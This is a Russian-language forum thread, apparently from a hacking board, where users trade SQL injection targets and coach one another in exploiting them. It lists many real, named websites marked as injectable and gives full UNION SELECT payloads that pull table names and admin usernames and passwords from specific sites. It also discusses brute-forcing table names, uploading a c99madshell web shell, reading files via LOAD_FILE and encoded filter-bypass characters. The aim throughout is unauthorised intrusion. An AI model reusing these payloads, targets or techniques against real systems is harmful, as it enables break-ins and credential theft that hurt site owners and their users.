http://www.hms.se/products/products.asp?PID=110%27 (https://hpc.name/redirector.html#http://www.hms.se/products/products.asp?PID=110%27)
http://www.jorkyball.org/home/page.asp?pid=58%27 (https://hpc.name/redirector.html#http://www.jorkyball.org/home/page.asp?pid=58%27)
http://www.sangean.com/products/prod....asp?pid=11%27 (https://hpc.name/redirector.html#http://www.sangean.com/products/prod....asp?pid=11%27)
http://www.anybus.com/products/products.asp?PID=140%27 (https://hpc.name/redirector.html#http://www.anybus.com/products/products.asp?PID=140%27)
http://www.hakkousa.com/detail.asp?PID=838%27 (https://hpc.name/redirector.html#http://www.hakkousa.com/detail.asp?PID=838%27)
http://academy.softjoys.ru/index.php3?pid=65%27 (https://hpc.name/redirector.html#http://academy.softjoys.ru/index.php3?pid=65%27) (русский сайт компьютерной академии)))
http://www.smtd.org/displayPage.asp?pID=25%27 (https://hpc.name/redirector.html#http://www.smtd.org/displayPage.asp?pID=25%27)
http://www.zonadostupa.ru/catal.php?pid=2 (https://hpc.name/redirector.html#http://www.zonadostupa.ru/catal.php?pid=2)'

http://www.uptime.ru/monitoring.php?pid=12%27 (https://hpc.name/redirector.html#http://www.uptime.ru/monitoring.php?pid=12%27)

Ого, ты накидал
Что-то конкретно не получается? Или это нам всем для практики?

Цитата:

Сообщение от stan_q

Ого, ты накидал
Что-то конкретно не получается? Или это нам всем для практики?

http://www.libraryonline.com/default.asp?pID=30 (https://hpc.name/redirector.html#http://www.libraryonline.com/default.asp?pID=30) С помощью Хелпера выбил Таблицу mysql.user и две колонки Password and User однако открыть их не как...

вот это ненаю что делать) почему не открыть то?)

а остальное да можете попробовать)

Цитата:

Сообщение от Hakera

две колонки Password and User однако открыть их не как...

Они пустые

Остальные брутить надо - там 4 ветка MySQL

Цитата:

Сообщение от stan_q

Они пустые

Остальные брутить надо - там 4 ветка MySQL

Тоесть вручную надо?)

Цитата:

Сообщение от Hakera

Тоесть вручную надо?)

Да

http://limetelecom.ru/news.php?page=-8 (https://hpc.name/redirector.html#http://limetelecom.ru/news.php?page=-8)

как можно дальше раскрутить?

onekey_nw, где ты там вобще SQL увидел?

onekey_nw, во-первых, тебе не в эту тему... во-вторых гадалки на других форумах. По заливке шелла тебе никто ничего не скажет, если ты не укажешь хотя бы сайт или движок, куда лил.
Хотя если и укажешь, тут это ничего не изменит xD

Цитата:


выдает ошибку. тип инвалид_фаил



мб, нельзя заливать файлы формата .php, поэтому и инвалид.

_______________
сорри, сайт сразу не увидел... ты его случаем не после этого поста туда приписал?))

хз) просто при подстановке "-" страница искажается. вот я и подумал что мб эт как-нить раскрутить можно

Вот скули, за час нашёл):
http://top.ryazan.ru/stat.php?id=1 (https://hpc.name/redirector.html#http://top.ryazan.ru/stat.php?id=1)'
http://divan-vam.com/stat.php?id=44 (https://hpc.name/redirector.html#http://divan-vam.com/stat.php?id=44)'
http://32.pvlad02.z8.ru/stat.php?id=38 (https://hpc.name/redirector.html#http://32.pvlad02.z8.ru/stat.php?id=38)'
http://artcatalog.su/stat.php?id=207 (https://hpc.name/redirector.html#http://artcatalog.su/stat.php?id=207)'
http://musicaviva.ru/new_site/stat.php?id=18 (https://hpc.name/redirector.html#http://musicaviva.ru/new_site/stat.php?id=18)'
http://top.interes.ge/stat.php?id=3637 (https://hpc.name/redirector.html#http://top.interes.ge/stat.php?id=3637)'
http://architekton.a3d.ru/stat.php?id=84 (https://hpc.name/redirector.html#http://architekton.a3d.ru/stat.php?id=84)'
http://artcatalog.su/stat.php?id=207 (https://hpc.name/redirector.html#http://artcatalog.su/stat.php?id=207)'
http://www.sarc.it/stat/stat.php?id=1 (https://hpc.name/redirector.html#http://www.sarc.it/stat/stat.php?id=1)'
http://www.inlove.org.ua/stat.php?id=18 (https://hpc.name/redirector.html#http://www.inlove.org.ua/stat.php?id=18)'
http://top.interes.ge/stat.php?id=322 (https://hpc.name/redirector.html#http://top.interes.ge/stat.php?id=322)'
http://www.water-mir.spb.ru/statdir/stat.php?id=1 (https://hpc.name/redirector.html#http://www.water-mir.spb.ru/statdir/stat.php?id=1)'
http://ocenshik.mostpp.ru/news.php?id=12 (https://hpc.name/redirector.html#http://ocenshik.mostpp.ru/news.php?id=12)'
http://www.povituha.ru/news.php?id=62 (https://hpc.name/redirector.html#http://www.povituha.ru/news.php?id=62)'
http://www.fc-anji.ru/news.php?id=916 (https://hpc.name/redirector.html#http://www.fc-anji.ru/news.php?id=916)'
http://goldenformula.net/news.php?id=48 (https://hpc.name/redirector.html#http://goldenformula.net/news.php?id=48)'

может этот вопрос и банальный, и за то что я его задаю в меня полетят тухлые помидоры. Но чет я туплю.

как залить шелл? Я получил админку. а что дальше?
шелл - c99madshell
делаю прикрепить фаил. но он выдает ошибку. тип инвалид_фаил. сайт http://mosbeer.com.ua (https://hpc.name/redirector.html#http://mosbeer.com.ua)

Цитата:

Сообщение от M@ZAX@KEP

onekey_nw, во-первых, тебе не в эту тему... во-вторых гадалки на других форумах. По заливке шелла тебе никто ничего не скажет, если ты не укажешь хотя бы сайт или движок, куда лил.
Хотя если и укажешь, тут это ничего не изменит xD
мб, нельзя заливать файлы формата .php, поэтому и инвалид.

сайт я указал.

а как узнать движок?

Сайт самописный. Но к нему прикручен форум phpbb. В сети полно манов по заливке шелла в phpbb, обычно через заливку стилей (насколько я помню).

Читать статьи, там всё написано. А не задавать таких глобальных вопросов.

Я поставил ковычку выдало

ADODB.Command error '800a0d5d'

Application uses a value of the wrong type for the current operation.

/categories.asp, line 19

Это sql уязвимость?
Если да то как её раскрутить?

Цитата:

Сообщение от Artur21774

Я поставил ковычку выдало ADODB.Command error '800a0d5d' Application uses a value of the wrong type for the current operation. /categories.asp, line 19 Это sql уязвимость? Если да то как её раскрутить?

Скорее всего нет. Ошибка синтаксиса отсутствует. А конкретно - "приложение использует значение неправильного типа для текущей операции", т.е. там присутствует проверка на тип данных.

Надеюсь сдесь помогут)пишу еще раз ибо тут глухо https://hpc.name/showthread.php?t=3644
Нашел инъекцию сканером Acunetix'ом Blind SQL/XPath injection
GET http://secretguard.org:80/index.php?page=main&area=${injectHere} HTTP/1.0
помогите расскрутить... оч надо

Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



помогите раскрутить. через order by подобрал - 8.
а вот почему то при union+select+1,2,3,4,5,6,7,8+--+ циферку не выводит. говорит тип просто синтаксис ерор (

подскажите пожалуйста

Скрытый текст (вы должны быть авторизованы и иметь 1 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Нашел эту уязвимость руками, проверил еще скуляпоиском - он тоже на неё ткнул.. Вроде всё нормально, но мои попытки извлечь оттуда таблицы не увенчались успехом. Пробовал руками (но он на запросы вообще не отвечает). Пробовал скуля хелпером - программа после хорошего старта начинает материться =/
Еще удивило, что сканер называет эту уязвимость блайндом, при том, что ошибка присутствует.

Подскажите, возможно ли это вообще и в чем я облажался? =)

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Слепая скуля, т.к. информация не выводится

Давайте и тут раскрутим) Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Цитата:

Сообщение от x0x

Давайте и тут раскрутим)

Там нет инъекции, имхо.

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

видео нету прошу если осталось у кого-то перезалить заранее благодарен.

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Добавлено через 17 минут
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Цитата:


5.0.90:spin-spbru@78.108.81.21:spinspbru_spin:portbld-freebsd8.1



Добавлено через 29 минут
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

code:

4.0.25-standard:biopnew_rus@web2.100mb.net:biopnew_rus:pc-linux-gnu

Добавлено через 1 час 27 минут
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

source:


capital_capitalF
@localhost
:
5.0
.
77
:capital_capitalFM

Цитата:

Сообщение от Norton710

да, это MySQL уязвимость.

эта ошибка выскакивает при следуещем запросе
без ошибки http://site.ru/val/?page=1 (https://hpc.name/redirector.html#http://site.ru/val/?page=1)
Когда ставлю - 1,
тоесть так http://site.ru/val/?page=-1 (https://hpc.name/redirector.html#http://site.ru/val/?page=-1)
тогда выскаивает

HTML highlight


Internal Server Error
Error 500
Mysql.Error("Mysql.exec: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 4")
(Ocsigen running in debug mode)

Руководствуясь какой статьей про SQL на форуме реальней всего раскрутить єту скулю?

Но когда подставляю '
или или page=-1+
тогда ошибки нет а только

code:

Wrong type for parameter page.

Скорее всего такая ошибка происходит из-за того, что значение '-1' для параметра ?page не умещается в тип данных, заданных для этого параметра.

Такая ошибка возможна и без наличия скули..

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

да, это MySQL уязвимость.

кому интересно можете покрутить!
http://www.reddem.ru//wp-content/plu...ion%28%29%20-- (https://hpc.name/redirector.html#http://www.reddem.ru//wp-content/plugins/forum-server/feed.php?topic=1%20union%20select%20version%28%29% 20--)

где ты там скулю увидел?

Цитата:

Сообщение от Norton710

где ты там скулю увидел?

http://www.myimg.de/?img=03373dc2.jpg

Красный Демотиватор Forum - Topic: 5.0.91-community-log
Это тебе о чем-то говорит????

ребята подскажите нюхал сайт с помощью JSky он тыкнул мне уязвимость

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

потом пробовал с prjSiteHack and sql injection tool пройти дальше но не пошло:( подскажите неопытному коллеге что делать? в какую сторону рыть дальше?

могу отблагодарить дедиками

Если софтом, то sql helper отлично справляется

да спасибо helper помог но пас админа мне добыть не удалось:( что еще предпринять можно?

А хелпер и не добывает пасс админа, если его нет в БД.
Скорее всего, пасс прописан в каком-нибудь php файле, проверяй возможность чтения файлов

пас админа получил но теперь не могу найти админку... пробрутил самыми распространенными адресами резу нет. есть еще варианты как ее найти?

Цитата:

Сообщение от Oro4imaru

пас админа получил но теперь не могу найти админку... пробрутил самыми распространенными адресами резу нет. есть еще варианты как ее найти?

ArxScan разве не дал ничего?
Тогда можно попробовать поднять логи сервера (если конечно есть варианты) через SQLi функцией LOAD_FILE

Цитата:


ArxScan разве не дал ничего?



нет он только показал что есть запароленные папки и все!

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY `listing`.`posted` DESC' at line 1
SELECT `listing`.`id`, `userid`, `listing`.`category` as `categoryid`, `c`.`title` as `category`,`listing`.`region` as `regionid`,`r`.`region` as `region`, `listing`.`title`, `price`, `addr_1`, `addr_2`, `city`, `zip`, `name`, `phone`, `email`, `website`, `detail`, `status`, `photo1`, `photo2`, `photo3`, `photo4`, `photo5`, `photo6`, `photo7`, `photo8`, `photo9`, `photo10`, `photo11`, `photo12`, `photo13`, `photo14`, `photo15`, `photo16`, `photo17`, `photo18`, `photo19`, `photo20`, `photo21`, `photo22`, `photo23`, `photo24`, `photo25`, `photo26`, `photo27`, `photo28`, `photo29`, `photo30`, `posted` FROM `listing`, `subcategory` `c`, `regions` `r` WHERE `c`.`id` = `listing`.`category` AND `r`.`id` = `listing`.`region` AND `listing`.`status` > -2 AND `c`.`category` = 1\' ORDER BY `listing`.`posted` DESC

Что это кто-то подскажет? Новичок в этом и не могу понять

Цитата:

Сообщение от Oro4imaru

нет он только показал что есть запароленные папки и все!

Если ты незнаешь для чего этот софт молчи.
Какбэ данный софт сделать для поиска нужных папок или просто узнать что там есть. (эх...старый WX :(. )
если что в нЭте (заметь,не гугл,а нЭт!) есть спец. "брут" админок
ЗЫ.понимаю что оффтоп,но человек спросил...
lamer+lamer,лично я вообщэ незнаю что ты тут написал

Цитата:

Сообщение от lamer+lamer

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY `listing`.`posted` DESC' at line 1
SELECT `listing`.`id`, `userid`, `listing`.`category` as `categoryid`, `c`.`title` as `category`,`listing`.`region` as `regionid`,`r`.`region` as `region`, `listing`.`title`, `price`, `addr_1`, `addr_2`, `city`, `zip`, `name`, `phone`, `email`, `website`, `detail`, `status`, `photo1`, `photo2`, `photo3`, `photo4`, `photo5`, `photo6`, `photo7`, `photo8`, `photo9`, `photo10`, `photo11`, `photo12`, `photo13`, `photo14`, `photo15`, `photo16`, `photo17`, `photo18`, `photo19`, `photo20`, `photo21`, `photo22`, `photo23`, `photo24`, `photo25`, `photo26`, `photo27`, `photo28`, `photo29`, `photo30`, `posted` FROM `listing`, `subcategory` `c`, `regions` `r` WHERE `c`.`id` = `listing`.`category` AND `r`.`id` = `listing`.`region` AND `listing`.`status` > -2 AND `c`.`category` = 1\' ORDER BY `listing`.`posted` DESC

Что это кто-то подскажет? Новичок в этом и не могу понять

Ты задал неверный запрос, как вижу ты оставил кавычку, кавычку нужно убрать.

Цитата:

Сообщение от lamer+lamer

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY `listing`.`posted` DESC' at line 1
SELECT `listing`.`id`, `userid`, `listing`.`category` as `categoryid`, `c`.`title` as `category`,`listing`.`region` as `regionid`,`r`.`region` as `region`, `listing`.`title`, `price`, `addr_1`, `addr_2`, `city`, `zip`, `name`, `phone`, `email`, `website`, `detail`, `status`, `photo1`, `photo2`, `photo3`, `photo4`, `photo5`, `photo6`, `photo7`, `photo8`, `photo9`, `photo10`, `photo11`, `photo12`, `photo13`, `photo14`, `photo15`, `photo16`, `photo17`, `photo18`, `photo19`, `photo20`, `photo21`, `photo22`, `photo23`, `photo24`, `photo25`, `photo26`, `photo27`, `photo28`, `photo29`, `photo30`, `posted` FROM `listing`, `subcategory` `c`, `regions` `r` WHERE `c`.`id` = `listing`.`category` AND `r`.`id` = `listing`.`region` AND `listing`.`status` > -2 AND `c`.`category` = 1\' ORDER BY `listing`.`posted` DESC

Что это кто-то подскажет? Новичок в этом и не могу понять

Судя по названиям - это имена таблиц в БД.

Norton710, нет, это имена столбцов, но сути не меняет. На ошибку впрошающего уже указал ShellAPI.

Ребят объясните пожалуйста:
В SQLI Хелпере пишет Версия датабазы 4 пользуйтесь брутом.

Цитата:


"Mysql is version 4 please brute either tables or columns"



Как пользоваться брутом ???
И еще такой вопрос вобщем вытащил я с одного сайта логин и пароль админа, а он не подходит) а в другом нету таблицы user.. или же я просто не нашел ..но все обыскал)

Цитата:

Сообщение от Rolexx93

Ребят объясните пожалуйста:
В SQLI Хелпере пишет Версия датабазы 4 пользуйтесь брутом.

Как пользоваться брутом ???

Жмешь "Get tables"

Цитата:

Сообщение от Rolexx93

И еще такой вопрос вобщем вытащил я с одного сайта логин и пароль админа, а он не подходит)

Пароль может быть захеширован в MD5

Цитата:

Сообщение от Rolexx93

а в другом нету таблицы user.. или же я просто не нашел ..но все обыскал)

Не на каждом сайте есть админ панель, или пользователи

Цитата:


В SQLI Хелпере пишет Версия датабазы 4 пользуйтесь брутом.



В мускуле 4 ветки нельзя получить имена таблиц и столбцов из INFORMATION_SCHEMA (её там попросту нет). Поэтому приходится брутить эти имена.
Хэлпер умеет это делать, но просто предупреждет что уйдёт много времени и будет срач в логах на атакуемом сайте.

есть 2 скули но никак не могу вывести таблички помогите кто может плииз

lemondate.se http://lemondate.se:80/qsearch.php?l...gender%5B%5D=2 (https://hpc.name/redirector.html#http://lemondate.se:80/qsearch.php?l=default&a=s&sgender=0&agef=&aget=&country%5B%5D=0&month=0&day=0&year=0&gender%5B%5D=2)'

http://lemondate.se:80/qsearch.php?l...ountry%5B%5D=0 (https://hpc.name/redirector.html#http://lemondate.se:80/qsearch.php?l=default&a=s&sgender=0&gender%5B%5D=2&agef=&aget=&month=0&day=0&year=0&country%5B%5D=0)'

ps и ещё один вопрос: как можно использовать(слить бд) такую уязвимость как File backup check? в JSky эта уязвимость обозначается самой высшей степенью риска,так же как и xss sql и тд

Вот дошол до
http://www.poznay-mir.ru/hotel.php?u...s+limit+70,1-- (https://hpc.name/redirector.html#http://www.poznay-mir.ru/hotel.php?uid=-1422+union+select+1,2,3,4,5,table_name,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21+from+information_sc hema.tables+limit+70,1--)
А дальше ввожу
http://www.poznay-mir.ru/hotel.php?u...1+from+users-- (https://hpc.name/redirector.html#http://www.poznay-mir.ru/hotel.php?uid=-1422+union+select+1,2,3,4,5,concat(Username,0x3a,P assword),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 +from+users--)
но нечего неполучается. Что не так?

Цитата:

Сообщение от dealer77

есть 2 скули но никак не могу вывести таблички помогите кто может плииз

lemondate.se http://lemondate.se:80/qsearch.php?l...gender%5B%5D=2 (https://hpc.name/redirector.html#http://lemondate.se:80/qsearch.php?l=default&a=s&sgender=0&agef=&aget=&country%5B%5D=0&month=0&day=0&year=0&gender%5B%5D=2)'

http://lemondate.se:80/qsearch.php?l...ountry%5B%5D=0 (https://hpc.name/redirector.html#http://lemondate.se:80/qsearch.php?l=default&a=s&sgender=0&gender%5B%5D=2&agef=&aget=&month=0&day=0&year=0&country%5B%5D=0)'

ps и ещё один вопрос: как можно использовать(слить бд) такую уязвимость как File backup check? в JSky эта уязвимость обозначается самой высшей степенью риска,так же как и xss sql и тд

Эта ошибка, не более.

Цитата:

Сообщение от Softic

Вот дошол до
http://www.poznay-mir.ru/hotel.php?u...s+limit+70,1-- (https://hpc.name/redirector.html#http://www.poznay-mir.ru/hotel.php?uid=-1422+union+select+1,2,3,4,5,table_name,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21+from+information_sc hema.tables+limit+70,1--)
А дальше ввожу
http://www.poznay-mir.ru/hotel.php?u...1+from+users-- (https://hpc.name/redirector.html#http://www.poznay-mir.ru/hotel.php?uid=-1422+union+select+1,2,3,4,5,concat(Username,0x3a,P assword),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 +from+users--)
но нечего неполучается. Что не так?

В таблице users, нету колонок Username и Password!

http://www.poznay-mir.ru/hotel.php?u...))+limit+1,1-- (https://hpc.name/redirector.html#http://www.poznay-mir.ru/hotel.php?uid=1422+union+select+1,2,3,4,5,column_n ame,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from +information_schema.columns+where+table_name=conca t(char(117),char(115),char(101),char(114),char(115 ))+limit+1,1--)

В таблице users только эти колонки -

email,date,status,unsubscribed,id

Цитата:

Сообщение от narviss

В таблице users, нету колонок Username и Password!

http://www.poznay-mir.ru/hotel.php?u...))+limit+1,1-- (https://hpc.name/redirector.html#http://www.poznay-mir.ru/hotel.php?uid=1422+union+select+1,2,3,4,5,column_n ame,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from +information_schema.columns+where+table_name=conca t(char(117),char(115),char(101),char(114),char(115 ))+limit+1,1--)

В таблице users только эти колонки -

email,date,status,unsubscribed,id

А неподскажиш как узнал какие таблицы там есть

Добавлено через 2 минуты
И как данные отуда вытащить например из таблицы email

Подскажите пожалуйста!
Вобщем уже побывал на многих сайтах, вытаскивал админов, но все они не подходят.
Вопрос)
Можно ли через эту ошибку добавить нового админа, или редактировать дизайн? вобщем что можно изменять??

Softic, читай статьи там всё подробно написано!https://hpc.name/showthread.php?t=3814
Цитата:

Сообщение от Rolexx93

Подскажите пожалуйста!
Вобщем уже побывал на многих сайтах, вытаскивал админов, но все они не подходят.
Вопрос)
Можно ли через эту ошибку добавить нового админа, или редактировать дизайн? вобщем что можно изменять??

Да возможно, шелл залить например, если права будут, пробей в гугле, как залить шелл через sql *)

А можно ли через ошибку, создать нового админа)или модератора)
Вытащил пассы админов, и не один не подходит)
Собственно шелл залить не могу))

Rolexx93, не уверен на 100%, но по-моему добавлять записи в базу можно только если инклуд в INSERT-запросе... (если соврал, ногами не пинайте xD)

Цитата:


А неподскажиш как узнал какие таблицы там есть



там вообще две бд..mysql и poznaymir

находим таблицы в бд под названием mysql..собсно там и находим таблицу user..
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

далее находим колонки в этой таблице..то бишь password и user
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

вытаскиваем содержимое
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

вуаля!

Цитата:

Сообщение от 1nt

Никакого мусора в ссылках не будет.

Щас попробую!

Добавлено через 5 минут
1nt Спасибо Все работает!+ поставил)

Цитата:

Сообщение от M@ZAX@KEP

Rolexx93, не уверен на 100%, но по-моему добавлять записи в базу можно только если инклуд в INSERT-запросе... (если соврал, ногами не пинайте xD)

А есть какой нибудь софт...)или все ручками...??
И еще плиз скиньте прогу MySQLi Dumper.
Дело в том что у меня она есть...но результат после скана выходит такой:

Цитата:

http://www.vodahost.com/ (https://hpc.name/redirector.html#http://www.vodahost.com/) .php?id=&sa=X|1
http://gonintendo.com/viewstory.php?id=154637 (https://hpc.name/redirector.html#http://gonintendo.com/viewstory.php?id=154637) .php?id=&sa=X|2
http://lyrikline.org/index.php?id=51&L=1 (https://hpc.name/redirector.html#http://lyrikline.org/index.php?id=51&L=1) .php?id=&sa=X|3
http://www.africancrisis.co.za/Article.php?ID=47276 (https://hpc.name/redirector.html#http://www.africancrisis.co.za/Article.php?ID=47276) .php?id=&sa=X|4
http://www.cacert.org/index.php?id=17 (https://hpc.name/redirector.html#http://www.cacert.org/index.php?id=17) .php?id=&sa=X|5
http://www.keepbusy.net/play.php?id=the-torture-game-3 (https://hpc.name/redirector.html#http://www.keepbusy.net/play.php?id=the-torture-game-3) .php?id=&sa=X|6
http://europaeische-bewegung.de/index.php?id=80 (https://hpc.name/redirector.html#http://europaeische-bewegung.de/index.php?id=80) .php?id=&sa=X|7



И т.п или я что не понимаю...но почему после скана он ставит везде..amp;sa=X|6

Вобщем скиньте норма сканнер или можт я чего не то делаю...?

сканер крут конечно, мусор кидает, но для себя наваял прогу, которая эту хрень обрезает =)
Кидаешь рядом со скомпиленной прогой файл base.txt, на выходе получаешь base_good.txt. Никакого мусора в ссылках не будет.

code:

#include
#include
#include
#include
using namespace std;
void fill (const char*);
const int BUFSIZE = 512;
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
system("color 0A");

// int y=99;
fill("base.txt");
system("pause");
}
void fill(const char* filename)
{
ifstream ifile(filename);
ofstream ofile("base_good.txt");
if (!ifile.good()) return; // Ошибка открытия

while (!ifile.eof())
{
char buf[BUFSIZE];
ifile.getline(buf, sizeof(buf)-1);
buf[BUFSIZE-1] = '\0';

for (int i=0;i<=strlen(buf); i++) if (buf[i]==' ' || buf[i]=='\n' || buf[i]==';') buf[i]=0;
cout<<buf<<"\n";
ofile<<buf; ofile<<"\n";

}
ifile.close();
ofile.close();
}

Скачать вместе с бинарником (https://hpc.name/downloads.php?do=file&id=3381)

Помогите вытасчить админа:
Вытащил версию бд:
4.0.27-max-log:dbo197803277@212.227.114.136:db197803277:pc-linux-gnu

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Не могу вытащить админа)Помогите)

Цитата:

Сообщение от Rolexx93

Не могу вытащить админа)Помогите)

пробрутил по своему словарю таблиц - ни одной не нашел. Скорее всего, у таблиц имеется префикс, что-то типа solutionfocusedtrainers_admin. Можешь вручную поугадывать. Других вариантов не вижу

Можно ли что-то раскрутить:

http://www.decor-style.ru/guestbook.php (https://hpc.name/redirector.html#http://www.decor-style.ru/guestbook.php)
http://www.bach.h1.ru/guestbook.php?from=1 (https://hpc.name/redirector.html#http://www.bach.h1.ru/guestbook.php?from=1)
http://eremarque.h1.ru/guestbook.php?from=1 (https://hpc.name/redirector.html#http://eremarque.h1.ru/guestbook.php?from=1)
http://www.5062125.ru/site/guestbook.php (https://hpc.name/redirector.html#http://www.5062125.ru/site/guestbook.php)

addr.ru - услуги хостинга))))

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Ты уверен, что там скуля есть? О.о

Тупо ошибки сервера!

Спасибо за помощь.
Ошибки проинъектить не смог, потому и спрашивал.

"Будем искать"...

вот на этом откопал кое че http://www.5062125.ru/site/catalog.p...der/**/by/**/1 (https://hpc.name/redirector.html#http://www.5062125.ru/site/catalog.php?id=2351/**/order/**/by/**/1) но сервер отвергает сам а скуля есть!

_йцукен_ Кулл...

ребят научить пользоваться брутом для 4 ветки.
Вобщем столько сайтов у кого версия 4 надо брутить, вручную долго и муторно.
Даже в том же самом хелпере есть брут ток я не понимаю как его настроить и брутить, так же нашел еще пару софтин для брута..ток не понимаю как брутить..
Объясните плиз...кто брутит)

Быстрый Blind SQL Injection. (https://hpc.name/redirector.html#https://rdot.org/forum/showthread.php?t=245) Сойдёт? =)

Цитата:

Сообщение от Rolexx93

Даже в том же самом хелпере есть брут ток я не понимаю как его настроить и брутить

А что там настраивать - наливай да пей, т.е. нажимай кнопку Get tables/Get columns, и хелпер будет пробовать имена из соответствующих баз - tables.txt и columns.txt

Цитата:

Сообщение от stan_q

А что там настраивать - наливай да пей, т.е. нажимай кнопку Get tables/Get columns, и хелпер будет пробовать имена из соответствующих баз - tables.txt и columns.txt

Когда 4 ветка он пишет типа Please brute/// все больше он ниче не делает)
Ну тут возник еще вопросик, нашел сайт ветка 5
Все откопал, делема!нету в таблице юзеров вобще)Тсс и такое бывает о_О

code:

_http://www.sovinterior.ru/news1.php?n=61

на сайте ошибки не видать, Хелпер помог)

Кстате можт кто сможет добить

code:

_http://www.elegance-auto.ru:80/news.php?id=2
_http://www.elegance-auto.ru:80/mod_picture.php?z=s&id=39
_http://www.elegance-auto.ru:80/order.php?id=39

http://positive.kz/default.asp?id= (https://hpc.name/redirector.html#http://positive.kz/default.asp?id=)'
а что с этой делать ! неполучаеться у меня!

Во-первых, числовой параметр при проверке не убирают, а дописывают кавычку после него:
http://positive.kz/default.asp?id=1 (https://hpc.name/redirector.html#http://positive.kz/default.asp?id=1)'
Во-вторых, ты удивишься, но это и близко на скулю не похоже.

Цитата:

http://positive.kz/default.asp?id= (https://hpc.name/redirector.html#http://positive.kz/default.asp?id=)'



ошибка в коде..

А с этой можно что-то сделать:

http://www.hostobzor.ru/vote/vote.php?id=51 (https://hpc.name/redirector.html#http://www.hostobzor.ru/vote/vote.php?id=51)'

Цитата:

Сообщение от Hellight

А с этой можно что-то сделать: Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Eridan, значит неправильно запрос строишь, либо сервер фильтрует union и select.

Но раз он ругается на +and+1=1, то получается, что ты запрос неправильно закрываешь.

Eridan
Тогда пробуй так:

source:


http://site.ru/index.php?
id
=9999999+union+select+1,2,3+--+
или
http://site.ru/index.php?
id
=1+and+1=2+union+select+1,2,3+--+

maxarr,попробывал сделать как ты сказал,такая же ошибка.Есть еще один скрипт,где проходит слепая инъекция,на этом же сайте,но раскрыв таблицы,колонки раскрыть не получается.Все же с простой скули легче инфу вытаскивать.Если есть еще идеи ,вот обе ссылки на скули:
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Всем привет,есть проблема с sql injection.При подстановке кавычки выдает ошибку вида:"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY id' at line 1" .
Далее можно определить количество полей через order by,но далее не получается продвинуться через union select,выдает ту же ошибку.Та же ситуация и при проверке через выражения типа : +and+1=1. Помогите пожалуйста разобраться с данной проблемой.

Вот ещё пару вариантов пробелов, которые ты не пробовал:

code:

%0b, %0c, %20, %a0, %23%0a, --%0a

Алсо через utf8_decode:

code:

%c0%09
%c0%0a
%c0%0b
%c0%0c
%c0%0d
%c0%20
%c0%49
%c0%4a
%c0%4b
%c0%4c
%c0%4d
%c0%60
%c0%89
%c0%8a
%c0%8b
%c0%8c
%c0%8d
%c0%a0
%c0%c9
%c0%ca
%c0%cb
%c0%cc
%c0%cd
%c0%e0
%e0%00%09
%e0%40%09
%e0%80%09

Встретил интересную скулю

code:

An error was encountered
Error: Unable to select comments.

MySQL reported: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''orderby1,10' at line 1.

Suggestion: Re-importing sql database you got in part 1 of site download will probably fix problem.

Вроде чистокровная скуля. Если судить по ошибке, то union, select и order by не фильтруются, но зато фильтруется пробел.
+,/**/,%09,%0a,%0d,%2b - пробовал, всё равно фильтрует..

Но раз БД у них работает, значит как-то пробел они используют =)
Кто знает, как обойти эту феню?)

Ребят,как понять,фильтруется union select или нет.Order by проходит , а union select нет

Eridan, сам ответил на свой вопрос) если order by работает, а union и select нет, значит последние фильтруются =)

Но на всякий случай проверь правильность составленного запроса, т.к. возможно просто в нём ошибка)

Ребят ,есть интересная ситуация,при попытки вывести таблицу :http://today.od.ua/index.php?where=2...chema.tables-- (https://hpc.name/redirector.html#http://today.od.ua/index.php?where=2+union+select+table_name+from+inf ormation_schema.tables--)
он выводит эту таблицу в ошибке ,как это обойти?

Цитата:

Сообщение от Eridan

Ребят ,есть интересная ситуация,при попытки вывести таблицу :http://today.od.ua/index.php?where=2...chema.tables-- (https://hpc.name/redirector.html#http://today.od.ua/index.php?where=2...chema.tables--)
он выводит эту таблицу в ошибке ,как это обойти?

Что это у тебя за запрос? Пиши конкретное имя таблицы

Вот:
http://www.kevinpearce.com/news.php?page= (https://hpc.name/redirector.html#http://www.kevinpearce.com/news.php?page=)'
Я знаю, что надо штрих ставить после цифры, но тогда нет ошибки. Она может быть полезна?

Гуру по SQL инъекции..
1.Во многих нахожу юзеров, не нахожу админки, в некоторых нету или я не могу найти таблиц где лежат логины пароли...у меня у одного так?

2.Как быть когда ты видишь MySQL инъекцию а ниче при этом не работает? ты видишь точно ошибку, но ни order by не работает, т.е ты не видишь таблиц и не union select ..
